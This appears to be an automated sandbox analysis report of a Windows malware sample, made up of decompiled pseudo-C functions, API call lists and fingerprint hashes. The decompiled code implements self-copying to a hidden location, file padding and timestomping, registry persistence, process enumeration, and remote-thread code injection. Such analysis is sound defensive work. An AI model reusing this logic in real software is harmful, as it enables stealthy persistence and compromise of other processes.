        • Instruction ID: df723a6c123b6986e8cd481e67e05ca2d984909c05c302a609d59009afb1c0ea
        • Opcode Fuzzy Hash: 0ff21e494fb825d6b069af88e8dedd6feb6e731155c79301bf749cd92992fbac
        • Instruction Fuzzy Hash: 0C016DB1684209AFEB00DFE4EC89BEF77BCEB00344F144025B501A2160E771DE449A68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040AB9A(CHAR* __ecx, void* __edx, intOrPtr _a4) {
        				struct HINSTANCE__* _t6;
        				_Unknown_base(*)()* _t10;
        				void* _t12;
        				signed short _t16;
        				CHAR** _t17;
        				struct HINSTANCE__* _t18;
        
        				_t12 = __edx; // executed
        				_t6 = LoadLibraryA(__ecx); // executed
        				_t18 = _t6;
        				if(_t18 == 0) {
        					L4:
        					return _t18;
        				}
        				_t16 = 0;
        				if(0 >= _a4) {
        					goto L4;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
        					_t10 = GetProcAddress(_t18,  *_t17);
        					if(_t10 == 0) {
        						break;
        					}
        					_t16 = _t16 + 1;
        					 *(_t17[1]) = _t10;
        					if(_t16 < _a4) {
        						continue;
        					}
        					goto L4;
        				}
        				return 0;
        			}

        APIs
        • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 0040ABA1
        • GetProcAddress.KERNELBASE(00000000), ref: 0040ABC1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: kernel32.dll
        • API String ID: 2574300362-1793498882
        • Opcode ID: ea14971a43593a48d75dfe0d8ddf12f23ee1867f915ecc87a67753dcf9f0bee9
        • Instruction ID: ecd0fbdec9421d356c3536c92b7f4e5714e442ce6e3fd95d029d0eabbe0d0d74
        • Opcode Fuzzy Hash: ea14971a43593a48d75dfe0d8ddf12f23ee1867f915ecc87a67753dcf9f0bee9
        • Instruction Fuzzy Hash: C7F027313003085BC3209FA5AD04473B7BEEF81742341483BBA42E3140EA35A811D269
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			_entry_(void* __ebx, void* __edi, void* __esi) {
        				signed int _v5;
        				int _v12;
        				signed int _v13;
        				long _v20;
        				void* _v24;
        				char _v28;
        				struct _FILETIME _v36;
        				struct _FILETIME _v44;
        				struct _FILETIME _v52;
        				short _v572;
        				short _v1092;
        				void* _t76;
        				intOrPtr _t78;
        				void* _t79;
        				signed int _t80;
        				signed int _t83;
        				intOrPtr _t84;
        				intOrPtr _t90;
        				signed int _t95;
        				signed int _t98;
        				void* _t101;
        				signed int _t105;
        				intOrPtr _t106;
        				signed int _t107;
        				intOrPtr _t108;
        				void* _t119;
        				signed int _t122;
        				intOrPtr _t125;
        				void* _t129;
        				long _t142;
        				intOrPtr _t150;
        				void* _t151;
        				intOrPtr _t154;
        				intOrPtr _t156;
        				intOrPtr _t158;
        				signed int _t159;
        				void* _t164;
        				signed int _t165;
        				signed int _t172;
        				void* _t174;
        				void* _t175;
        				intOrPtr _t176;
        				void* _t177;
        				void* _t180;
        				void* _t181;
        
        				_t177 = __esi;
        				E00407626(); // executed
        				_t76 = E0040AC42(); // executed
        				if(_t76 == 0) {
        					return 0;
        				}
        				_v12 = 0;
        				_t172 = GetCommandLineA();
        				__eflags = _t172;
        				if(_t172 == 0) {
        					L11:
        					_t78 =  *0x414ad4; // 0x241f5a8
        					_t79 = CreateMutexW(0x4155b4, 1,  *(_t78 + 0x30)); // executed
        					_v24 = _t79;
        					_t80 = GetLastError();
        					__eflags = _t80;
        					if(_t80 != 0) {
        						L48:
        						__eflags = _v24;
        						if(_v24 != 0) {
        							CloseHandle(_v24);
        						}
        						E00412042(_t170, _t172);
        						ExitProcess(0);
        					}
        					_t83 = E004067E4(); // executed
        					_v5 = _t83;
        					_t84 =  *0x414ad4; // 0x241f5a8
        					_v20 = 0;
        					_v13 = 0;
        					__eflags = E0040AA0E( *((intOrPtr*)(_t84 + 0x2c)));
        					if(__eflags == 0) {
        						L23:
        						_push(_t177);
        						GetModuleFileNameW(0,  &_v1092, 0x104);
        						E0040AE3C( &_v572);
        						_t90 =  *0x414ad4; // 0x241f5a8
        						PathCombineW( &_v572,  &_v572,  *(_t90 + 0xc));
        						_t95 = lstrcmpiW( &_v1092,  &_v572);
        						__eflags = _t95;
        						_push( &_v572);
        						if(_t95 == 0) {
        							_v5 = 0;
        							E0040B355();
        							L38:
        							__eflags = _v5;
        							if(_v5 == 0) {
        								_t98 =  *0x414be8; // 0x0
        								_t170 =  *0x414ad4; // 0x241f5a8
        								_t101 = E0040B135( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
        								_t174 = _t101;
        								while(1) {
        									_t105 = E00407DA0(0, _t170, 0x407038 -  *0x414ca0, _t174); // executed
        									__eflags = _t105;
        									if(_t105 != 0) {
        										break;
        									}
        									Sleep(0x14); // executed
        								}
        								while(1) {
        									_t106 =  *0x414ad4; // 0x241f5a8
        									_t107 = E0040AA0E( *((intOrPtr*)(_t106 + 0x28)));
        									__eflags = _t107;
        									if(_t107 != 0) {
        										break;
        									}
        									Sleep(0x14);
        								}
        								L47:
        								goto L48;
        							}
        							__eflags = _v13;
        							if(__eflags != 0) {
        								_t108 =  *0x414ad4; // 0x241f5a8
        								E0040AA33(__eflags,  *((intOrPtr*)(_t108 + 0x2c)), 0xa, 0, 0, 0, 0);
        							}
        							goto L47;
        						}
        						E0040B355(); // executed
        						E00410093( &_v572);
        						CopyFileW( &_v1092,  &_v572, 0); // executed
        						SetFileAttributesW( &_v572, 0x26); // executed
        						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
        						_v12 = _t119;
        						__eflags = _t119 - 0xffffffff;
        						if(_t119 == 0xffffffff) {
        							L36:
        							SetFileAttributesW( &_v572, 0x21); // executed
        							goto L38;
        						}
        						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
        						__eflags = _t122;
        						if(_t122 == 0) {
        							L33:
        							 *0x414b58(0,  &_v1092, 0x25, 1);
        							_t125 =  *0x414ad4; // 0x241f5a8
        							PathCombineW( &_v1092,  &_v1092,  *(_t125 + 0x5c));
        							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
        							_t180 = _t129;
        							__eflags = _t180 - 0xffffffff;
        							if(_t180 != 0xffffffff) {
        								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
        								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
        								FindCloseChangeNotification(_t180); // executed
        							}
        							CloseHandle(_v12);
        							goto L36;
        						}
        						_t142 = E004102A8(0x400, 0x40) << 9;
        						_v20 = _t142;
        						__eflags = _t142;
        						if(_t142 == 0) {
        							_t175 = 0;
        							__eflags = 0;
        						} else {
        							_t175 = E0040F14B(_t142);
        							_t142 = _v20;
        						}
        						__eflags = _t175;
        						if(_t175 == 0) {
        							goto L33;
        						} else {
        							_t181 = 0;
        							__eflags = _t142;
        							if(_t142 <= 0) {
        								L32:
        								_t170 =  &_v20;
        								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
        								FlushFileBuffers(_v12);
        								E0040F15E(_t175);
        								goto L33;
        							} else {
        								goto L31;
        							}
        							do {
        								L31:
        								 *((char*)(_t181 + _t175)) = E004102A8(E004102A8(0xff, 1), 0);
        								_t142 = _v20;
        								_t181 = _t181 + 1;
        								__eflags = _t181 - _t142;
        							} while (_t181 < _t142);
        							goto L32;
        						}
        					}
        					_t150 =  *0x414ad4; // 0x241f5a8
        					_t151 = E0040AA33(__eflags,  *((intOrPtr*)(_t150 + 0x2c)), 1, 0, 0, 0, 0);
        					__eflags = _v12 & 0x00000001;
        					if(__eflags != 0) {
        						L16:
        						_t154 =  *0x414ad4; // 0x241f5a8
        						_v12 = 0;
        						E0040AA33(__eflags,  *((intOrPtr*)(_t154 + 0x2c)), 0xb,  &_v12,  &_v20, 0, 0);
        						_t156 =  *0x414ad4; // 0x241f5a8
        						_push(0);
        						_push(0);
        						_push(0);
        						_push(0);
        						__eflags = _v5;
        						if(__eflags == 0) {
        							_push(3);
        							_push( *((intOrPtr*)(_t156 + 0x2c)));
        							E0040AA33(__eflags);
        							while(1) {
        								_t158 =  *0x414ad4; // 0x241f5a8
        								_t159 = E0040AA0E( *((intOrPtr*)(_t158 + 0x2c)));
        								__eflags = _t159;
        								if(_t159 == 0) {
        									break;
        								}
        								Sleep(0x14);
        							}
        							L21:
        							_v13 = 1;
        							__eflags = _v12;
        							if(_v12 != 0) {
        								E00410093(_v12);
        								E0040F15E(_v12);
        							}
        							goto L23;
        						}
        						_push(9);
        						_push( *((intOrPtr*)(_t156 + 0x2c)));
        						E0040AA33(__eflags);
        						goto L21;
        					}
        					__eflags = _t151 - 0x1020716;
        					if(__eflags < 0) {
        						goto L16;
        					}
        					CloseHandle(_v24);
        					ExitProcess(0);
        				} else {
        					_t164 = E0040F637(_t172);
        					_t170 =  &_v28;
        					_t165 = E0040F480(_t164,  &_v28, _t172);
        					__eflags = _t165;
        					if(_t165 <= 0) {
        						goto L11;
        					}
        					_t176 = _v28;
        					_t172 = 0;
        					__eflags = _t165;
        					if(_t165 <= 0) {
        						L10:
        						E0040F17A(_t165, _t176);
        						goto L11;
        					} else {
        						goto L5;
        					}
        					do {
        						L5:
        						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
        						__eflags =  *_t170 - 0x2d;
        						if( *_t170 == 0x2d) {
        							__eflags =  *((char*)(_t170 + 1)) - 0x66;
        							if( *((char*)(_t170 + 1)) == 0x66) {
        								__eflags =  *(_t170 + 2);
        								if( *(_t170 + 2) == 0) {
        									_t8 =  &_v12;
        									 *_t8 = _v12 | 0x00000001;
        									__eflags =  *_t8;
        								}
        							}
        						}
        						_t172 = _t172 + 1;
        						__eflags = _t172 - _t165;
        					} while (_t172 < _t165);
        					goto L10;
        				}
        			}
        0x00000000
        0x004068be

        APIs
        • GetCommandLineA.KERNEL32 ref: 00406896
        • CreateMutexW.KERNELBASE(004155B4,00000001,?), ref: 004068EE
        • GetLastError.KERNEL32 ref: 004068F7
        • CloseHandle.KERNEL32(?,?,00000001,00000000,00000000,00000000,00000000,?), ref: 0040694B
        • ExitProcess.KERNEL32 ref: 00406952
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
        • String ID:
        • API String ID: 1529117804-0
        • Opcode ID: 44af3022d04b0f46c42d2671b9abcc3574491615fdb812ceeb669f2820a16da5
        • Instruction ID: f1cb11c83471a368260cfb09b9036ef456753c44cfc8c40dc57c0bed504cb708
        • Opcode Fuzzy Hash: 44af3022d04b0f46c42d2671b9abcc3574491615fdb812ceeb669f2820a16da5
        • Instruction Fuzzy Hash: 5AB184B1900218AFDF11ABA0DD89EEE7B7DEF44304F018076F206B61A1D7799D65CB29
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00406958() {
        				DWORD* _t47;
        				int _t52;
        				signed int _t55;
        				void* _t58;
        				void* _t62;
        				DWORD* _t63;
        				void* _t64;
        				DWORD* _t67;
        				void* _t78;
        				long _t81;
        				DWORD* _t84;
        				void* _t88;
        				long _t101;
        				struct _OVERLAPPED* _t109;
        				void* _t111;
        				void* _t112;
        				void* _t113;
        				void* _t116;
        				void* _t117;
        				void* _t118;
        
        				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
        				E0040AE3C(_t118 - 0x238);
        				_t47 =  *0x414ad4; // 0x241f5a8
        				PathCombineW(_t118 - 0x238, _t118 - 0x238, _t47[3]);
        				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
        				_push(_t118 - 0x238);
        				if(_t52 == 0) {
        					 *(_t118 - 1) = _t109;
        					E0040B355();
        					goto L16;
        				} else {
        					E0040B355(); // executed
        					E00410093(_t118 - 0x238);
        					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
        					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
        					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
        					 *(_t118 - 8) = _t78;
        					if(_t78 == 0xffffffff) {
        						L14:
        						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
        						L16:
        						if( *(_t118 - 1) == _t109) {
        							_t55 =  *0x414be8; // 0x0
        							_t110 =  *0x414ad4; // 0x241f5a8
        							_t58 = E0040B135( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
        							_t112 = _t58;
        							while(1) {
        								_t62 = E00407DA0(0, _t110, 0x407038 -  *0x414ca0, _t112); // executed
        								__eflags = _t62;
        								if(_t62 != 0) {
        									break;
        								}
        								Sleep(0x14); // executed
        							}
        							while(1) {
        								_t63 =  *0x414ad4; // 0x241f5a8
        								_t64 = E0040AA0E(_t63[0xa]);
        								__eflags = _t64;
        								if(_t64 != 0) {
        									break;
        								}
        								Sleep(0x14);
        							}
        							L25:
        							if( *(_t118 - 0x14) != _t109) {
        								CloseHandle( *(_t118 - 0x14));
        							}
        							E00412042(_t110, _t111);
        							ExitProcess(_t109);
        						}
        						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
        						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
        							_t67 =  *0x414ad4; // 0x241f5a8
        							E0040AA33(_t128, _t67[0xb], 0xa, _t109, _t109, _t109, _t109);
        						}
        						goto L25;
        					}
        					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
        					if(_t81 == 0) {
        						L11:
        						 *0x414b58(_t109, _t118 - 0x440, 0x25, 1);
        						_t84 =  *0x414ad4; // 0x241f5a8
        						PathCombineW(_t118 - 0x440, _t118 - 0x440, _t84[0x17]);
        						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
        						_t116 = _t88;
        						if(_t116 != 0xffffffff) {
        							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
        							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
        							FindCloseChangeNotification(_t116); // executed
        						}
        						CloseHandle( *(_t118 - 8));
        						goto L14;
        					}
        					_t101 = E004102A8(0x400, 0x40) << 9;
        					 *(_t118 - 0x10) = _t101;
        					if(_t101 == _t109) {
        						_t113 = 0;
        						__eflags = 0;
        					} else {
        						_t113 = E0040F14B(_t101);
        						_t101 =  *(_t118 - 0x10);
        					}
        					if(_t113 == _t109) {
        						goto L11;
        					} else {
        						_t117 = 0;
        						if(_t101 <= _t109) {
        							L10:
        							_t110 = _t118 - 0x10;
        							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
        							FlushFileBuffers( *(_t118 - 8));
        							E0040F15E(_t113);
        							goto L11;
        						} else {
        							goto L9;
        						}
        						do {
        							L9:
        							 *((char*)(_t117 + _t113)) = E004102A8(E004102A8(0xff, 1), _t109);
        							_t101 =  *(_t118 - 0x10);
        							_t117 = _t117 + 1;
        						} while (_t117 < _t101);
        						goto L10;
        					}
        				}
        			}

        APIs
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004069DC
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 004069FD
        • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00406A11
        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,?), ref: 00406A46
        • SetFileAttributesW.KERNELBASE(?,00000026,?,?), ref: 00406A55
        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406A6E
        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,?), ref: 00406A85
        • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,?), ref: 00406AE4
        • FlushFileBuffers.KERNEL32(?,?,?), ref: 00406AED
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,?), ref: 00406B05
        • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00406B1B
        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?), ref: 00406B34
        • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 00406B4E
        • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 00406B63
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 00406B6A
        • CloseHandle.KERNEL32(?,?,?), ref: 00406B73
        • SetFileAttributesW.KERNELBASE(?,00000021,?,?), ref: 00406B82
        • Sleep.KERNELBASE(00000014,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00406BD5
        • Sleep.KERNEL32(00000014,?,-0000DC68,00000000,?,?), ref: 00406BF4
        • CloseHandle.KERNEL32(?), ref: 00406C14
        • ExitProcess.KERNEL32 ref: 00406C20
          • Part of subcall function 0040B355: RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 0040B387
          • Part of subcall function 0040B355: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3AA
          • Part of subcall function 0040B355: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3E3
          • Part of subcall function 0040B355: StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 0040B40D
          • Part of subcall function 0040B355: RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 0040B48F
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$AllocateBuffersChangeCopyDeleteExitFindFlushHeapModuleNameNotificationPointerProcessWritelstrcmpi
        • String ID:
        • API String ID: 33030036-0
        • Opcode ID: 7a25980ef5ba6dc2ad4c6a38649dd5471911fb9501acee7d04876079f88a8e04
        • Instruction ID: 25290067b2d062b729b8758c824f3da7e3c44a44cb3254c285820f99a9c9abe9
        • Opcode Fuzzy Hash: 7a25980ef5ba6dc2ad4c6a38649dd5471911fb9501acee7d04876079f88a8e04
        • Instruction Fuzzy Hash: 785153B2900219AFDB11ABE0DC88EEE777CEB44304F054176F206F6190DB789E95CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E0040B355(WCHAR* _a4) {
        				int _v8;
        				void* _v12;
        				int _v16;
        				intOrPtr _t45;
        				long _t46;
        				intOrPtr _t48;
        				intOrPtr _t52;
        				int _t55;
        				intOrPtr _t59;
        				signed int _t61;
        				intOrPtr _t71;
        				signed int _t72;
        				short _t74;
        				int _t76;
        				char* _t77;
        				WCHAR* _t82;
        				int _t84;
        				char* _t85;
        				signed int _t87;
        				signed int _t88;
        
        				_t76 = 0;
        				_t84 = E0040F649(_a4);
        				_t45 =  *0x414ad4; // 0x241f5a8
        				_v16 = _t84;
        				_t46 = RegCreateKeyExW(0x80000002,  *(_t45 + 0x3c), 0, 0, 0, 3, 0,  &_v12, 0); // executed
        				if(_t46 != 0) {
        					L19:
        					_t39 = _t84 + 2; // 0x2
        					_t48 =  *0x414ad4; // 0x241f5a8
        					_t76 = E0040861B(0x80000001,  *((intOrPtr*)(_t48 + 0x40)),  *((intOrPtr*)(_t48 + 0x44)), 1, _a4, _t84 + _t39);
        				} else {
        					_t52 =  *0x414ad4; // 0x241f5a8
        					_v8 = 0;
        					RegQueryValueExW(_v12,  *(_t52 + 0x44), 0, 0, 0,  &_v8); // executed
        					_t55 = _v8 + 0xa + _t84 * 2;
        					_v8 = _t55;
        					if(_t55 != 0) {
        						_t85 = E0040F14B(_t55);
        						if(_t85 != 0) {
        							_t59 =  *0x414ad4; // 0x241f5a8
        							RegQueryValueExW(_v12,  *(_t59 + 0x44), 0, 0, _t85,  &_v8); // executed
        							_t77 = _t85;
        							_t82 = _t85;
        							while(1) {
        								_t61 =  *_t77 & 0x0000ffff;
        								if(_t61 == 0 || _t61 == 0x2c) {
        									goto L6;
        								}
        								L9:
        								if( *_t77 == 0) {
        									_t87 = E0040F649(_t85);
        									if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
        										_t74 = 0x2c;
        										 *(_t85 + _t87 * 2) = _t74;
        										_t87 = _t87 + 1;
        									}
        									lstrcpyW(_t85 + _t87 * 2, _a4);
        									_t88 = _t87 + _v16;
        									lstrcpyW(_t85 + _t88 * 2, ",");
        									_t71 =  *0x414ad4; // 0x241f5a8
        									_t72 = RegSetValueExW(_v12,  *(_t71 + 0x44), 0, 1, _t85, _t88 + _t88 + 4); // executed
        									asm("sbb bl, bl");
        									_t76 =  ~_t72 + 1;
        								} else {
        									_t77 =  &(_t77[2]);
        									continue;
        								}
        								L16:
        								E0040F15E(_t85);
        								goto L17;
        								L6:
        								if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
        									_t20 =  &(_t77[2]); // 0x4
        									_t82 = _t20;
        									goto L9;
        								} else {
        									_t76 = 1;
        								}
        								goto L16;
        							}
        						}
        					}
        					L17:
        					RegCloseKey(_v12); // executed
        					if(_t76 == 0) {
        						_t84 = _v16;
        						goto L19;
        					}
        				}
        				return _t76;
        			}

        APIs
        • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 0040B387
        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3AA
        • RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 0040B48F
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3E3
        • StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 0040B40D
        • lstrcpyW.KERNEL32(00000000,?), ref: 0040B44B
        • lstrcpyW.KERNEL32(00000000,00403B2C), ref: 0040B45D
        • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000000,?,?,?,00000000,?), ref: 0040B478
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Value$Querylstrcpy$AllocateCloseCreateHeap
        • String ID:
        • API String ID: 1578894565-0
        • Opcode ID: 2140d7f2d15cc8401083f8ab4f39277a003be0053bfafb938b3a6f2cb05faaa8
        • Instruction ID: cb96c936b7ea4c42502c986684f269d206cb6bbbaf00a83b3d6581d2f158eef4
        • Opcode Fuzzy Hash: 2140d7f2d15cc8401083f8ab4f39277a003be0053bfafb938b3a6f2cb05faaa8
        • Instruction Fuzzy Hash: BD41AB35500014FBCB209BA5DC88EEF7FB9EF44744B008076F505A72A1D775EA11CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040B77A(long _a4, union _SID_NAME_USE _a8) {
        				void* _v8;
        				short _v528;
        				int _t26;
        				int _t32;
        				union _TOKEN_INFORMATION_CLASS _t33;
        				void* _t35;
        
        				_t33 = 0;
        				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
        					_a4 = 0;
        					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed
        					_t22 = _a4;
        					if(_a4 != 0) {
        						_t35 = E0040F14B(_t22);
        						if(_t35 != 0) {
        							_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed
        							if(_t26 != 0) {
        								_a4 = 0x103;
        								_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
        								if(_t32 != 0) {
        									_t33 = 1;
        								}
        							}
        							E0040F15E(_t35);
        						}
        					}
        					FindCloseChangeNotification(_v8); // executed
        				}
        				return _t33;
        			}

        APIs
        • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 0040B78F
        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0040B7A7
        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040B80D
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?,00000000), ref: 0040B7CD
        • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040B7F7
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$Information$AccountAllocateChangeCloseFindHeapLookupNotificationOpenProcess
        • String ID:
        • API String ID: 3037326660-0
        • Opcode ID: d35754d54785953d71cdff8bb753121010e935703a1aa6110ee0ff9ea7e2f695
        • Instruction ID: b2373f3da924d19ed68c6cd84d16c7042f86e4ac8534a0d49ec1cafa0ac56add
        • Opcode Fuzzy Hash: d35754d54785953d71cdff8bb753121010e935703a1aa6110ee0ff9ea7e2f695
        • Instruction Fuzzy Hash: 6A11CBB6500108BBDB11AF90DC85EDA7BADEB04380F108036F909AA191D775DB549BA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004067E4() {
        				short _v524;
        				intOrPtr _v552;
        				void* _v560;
        				void* _t10;
        				struct tagPROCESSENTRY32W* _t11;
        				int _t15;
        				int _t19;
        				signed short _t20;
        				intOrPtr _t21;
        				void* _t22;
        				signed short _t24;
        
        				_t20 = 0;
        				_v560 = 0x22c;
        				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
        				_t22 = _t10;
        				_t11 =  &_v560;
        				Process32FirstW(_t22, _t11); // executed
        				if(_t11 != 0) {
        					do {
        						_t24 = 0;
        						if(_v552 != 0) {
        							while(1) {
        								_t21 =  *0x414ad4; // 0x241f5a8
        								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401af0 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
        								if(_t19 == 0) {
        									break;
        								}
        								_t24 = _t24 + 1;
        								if(_t24 < 2) {
        									continue;
        								} else {
        								}
        								goto L7;
        							}
        							_t20 = 1;
        						}
        						L7:
        						_t15 = Process32NextW(_t22,  &_v560); // executed
        					} while (_t15 != 0);
        				}
        				FindCloseChangeNotification(_t22); // executed
        				return _t20;
        			}

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004067FF
        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040680F
        • lstrcmpiW.KERNELBASE(?,0241F5A8,?,?,00000000), ref: 0040683F
        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040685C
        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00406868
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
        • String ID:
        • API String ID: 545148253-0
        • Opcode ID: dd6914161e8e9203adea9653e70c90f5d78b6172d22da83b63f875d886e21469
        • Instruction ID: 35acf2452c93eeb79a8f0a149dae4cae391aa9f434f1dd701b082c2c4d78efd5
        • Opcode Fuzzy Hash: dd6914161e8e9203adea9653e70c90f5d78b6172d22da83b63f875d886e21469
        • Instruction Fuzzy Hash: FD01B132602124ABDB206BA1ED4CBFB77ACAB85B41F11807AE406E2190D6788855DB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407DA0(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
        				char _v5;
        				char _v6;
        				void* _t11;
        				intOrPtr _t12;
        				void* _t23;
        
        				_t23 = __eax;
        				_v5 = 1;
        				_v6 = 0;
        				if(__eax != 0) {
        					L4:
        					_t11 = E00407665(_t23); // executed
        					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) {
        						_v6 = 1;
        					}
        					if(_v5 == 0) {
        						FindCloseChangeNotification(_t23); // executed
        					}
        					_t12 = _v6;
        				} else {
        					_v5 = 0;
        					if(_a8 == 0) {
        						L3:
        						_t12 = 0;
        					} else {
        						_t23 = OpenProcess(0x43a, 0, _a8);
        						if(_t23 != 0) {
        							goto L4;
        						} else {
        							goto L3;
        						}
        					}
        				}
        				return _t12;
        			}

        APIs
        • OpenProcess.KERNEL32(0000043A,00000000,?,00407038,00000000,?,?,00406BEC,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00407DC6
        • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407DEF
        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00407038,00000000,?,?,00406BEC,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00407E03
